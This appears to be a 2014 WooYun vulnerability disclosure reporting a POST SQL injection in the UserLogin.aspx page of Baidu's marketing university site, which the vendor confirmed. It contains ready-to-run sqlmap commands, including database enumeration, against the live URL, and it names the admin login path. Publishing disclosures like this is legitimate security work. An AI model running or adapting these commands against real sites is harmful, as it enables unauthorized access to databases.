漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-078033
漏洞标题:百度某业务存在SQL注入
相关厂商:百度
漏洞作者: 玉林嘎
提交时间:2014-10-01 13:47
修复时间:2014-11-15 13:48
公开时间:2014-11-15 13:48
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-01: 细节已通知厂商并且等待厂商处理中
2014-10-01: 厂商已经确认,细节仅向厂商公开
2014-10-11: 细节向核心白帽子及相关领域专家公开
2014-10-21: 细节向普通白帽子公开
2014-10-31: 细节向实习白帽子公开
2014-11-15: 细节向公众公开
简要描述:
感谢 @子非海绵宝宝
详细说明:
百度营销大学
http://edu.baidu.com
这站做的真不想是百度的 看了下就感觉有问题
http://edu.baidu.com/marketing2014/UserLogin.aspx
存在post注入
sqlmap -u "http://edu.baidu.com/marketing2014/UserLogin.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE0MDA3MzY3OTMPZBYCZg9kFgICAw9kFgQCAQ9kFgICAw8PFgIeBFRleHQFHCrmgqjovpPlhaXnmoTkv6Hmga%2FkuI3lrZjlnKhkZAIDDxYCHwAFZyA8YSBocmVmPSJodHRwOi8vZWR1LmJhaWR1LmNvbS9tYXJrZXRpbmcvZXhhbS5odG1sIiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9ImltYWdlcy9idG5fYTMucG5nIiAvPjwvYT5kZHWQ7c9rH0oYTVYxEC2zMpHoBE3XeLPltdK3RlzQttiu&__EVENTVALIDATION=%2FwEWBALlyISSBQKYtLi6AQKokaLfCgKQpNGwDxlXNsuJo93613oPjmrWgSK4%2BKMg9SVp9g09l%2B1A4z8f&ctl00%24ContentPlaceHolder1%24txtLoginName=312312312123123&ctl00%24ContentPlaceHolder1%24btnSave=%E4%B8%8B%E4%B8%80%E6%AD%A5&ctl00%24hiddTime=2014-09-15"
sqlmap -u "http://edu.baidu.com/marketing2014/UserLogin.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE0MDA3MzY3OTMPZBYCZg9kFgICAw9kFgQCAQ9kFgICAw8PFgIeBFRleHQFHCrmgqjovpPlhaXnmoTkv6Hmga%2FkuI3lrZjlnKhkZAIDDxYCHwAFZyA8YSBocmVmPSJodHRwOi8vZWR1LmJhaWR1LmNvbS9tYXJrZXRpbmcvZXhhbS5odG1sIiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9ImltYWdlcy9idG5fYTMucG5nIiAvPjwvYT5kZHWQ7c9rH0oYTVYxEC2zMpHoBE3XeLPltdK3RlzQttiu&__EVENTVALIDATION=%2FwEWBALlyISSBQKYtLi6AQKokaLfCgKQpNGwDxlXNsuJo93613oPjmrWgSK4%2BKMg9SVp9g09l%2B1A4z8f&ctl00%24ContentPlaceHolder1%24txtLoginName=312312312123123&ctl00%24ContentPlaceHolder1%24btnSave=%E4%B8%8B%E4%B8%80%E6%AD%A5&ctl00%24hiddTime=2014-09-15" --dbs
后台地址:http://edu.baidu.com/marketing2014/admin/login.aspx
漏洞证明:
百度营销大学
http://edu.baidu.com
这站做的真不想是百度的 看了下就感觉有问题
http://edu.baidu.com/marketing2014/UserLogin.aspx
存在post注入
sqlmap -u "http://edu.baidu.com/marketing2014/UserLogin.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE0MDA3MzY3OTMPZBYCZg9kFgICAw9kFgQCAQ9kFgICAw8PFgIeBFRleHQFHCrmgqjovpPlhaXnmoTkv6Hmga%2FkuI3lrZjlnKhkZAIDDxYCHwAFZyA8YSBocmVmPSJodHRwOi8vZWR1LmJhaWR1LmNvbS9tYXJrZXRpbmcvZXhhbS5odG1sIiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9ImltYWdlcy9idG5fYTMucG5nIiAvPjwvYT5kZHWQ7c9rH0oYTVYxEC2zMpHoBE3XeLPltdK3RlzQttiu&__EVENTVALIDATION=%2FwEWBALlyISSBQKYtLi6AQKokaLfCgKQpNGwDxlXNsuJo93613oPjmrWgSK4%2BKMg9SVp9g09l%2B1A4z8f&ctl00%24ContentPlaceHolder1%24txtLoginName=312312312123123&ctl00%24ContentPlaceHolder1%24btnSave=%E4%B8%8B%E4%B8%80%E6%AD%A5&ctl00%24hiddTime=2014-09-15"
sqlmap -u "http://edu.baidu.com/marketing2014/UserLogin.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE0MDA3MzY3OTMPZBYCZg9kFgICAw9kFgQCAQ9kFgICAw8PFgIeBFRleHQFHCrmgqjovpPlhaXnmoTkv6Hmga%2FkuI3lrZjlnKhkZAIDDxYCHwAFZyA8YSBocmVmPSJodHRwOi8vZWR1LmJhaWR1LmNvbS9tYXJrZXRpbmcvZXhhbS5odG1sIiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9ImltYWdlcy9idG5fYTMucG5nIiAvPjwvYT5kZHWQ7c9rH0oYTVYxEC2zMpHoBE3XeLPltdK3RlzQttiu&__EVENTVALIDATION=%2FwEWBALlyISSBQKYtLi6AQKokaLfCgKQpNGwDxlXNsuJo93613oPjmrWgSK4%2BKMg9SVp9g09l%2B1A4z8f&ctl00%24ContentPlaceHolder1%24txtLoginName=312312312123123&ctl00%24ContentPlaceHolder1%24btnSave=%E4%B8%8B%E4%B8%80%E6%AD%A5&ctl00%24hiddTime=2014-09-15" --dbs
后台地址:http://edu.baidu.com/marketing2014/admin/login.aspx
修复方案:
你们更懂
版权声明:转载请注明来源 玉林嘎@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-10-01 23:44
厂商回复:
感谢提交,我们已经通知业务部门处理此问题。
最新状态:
暂无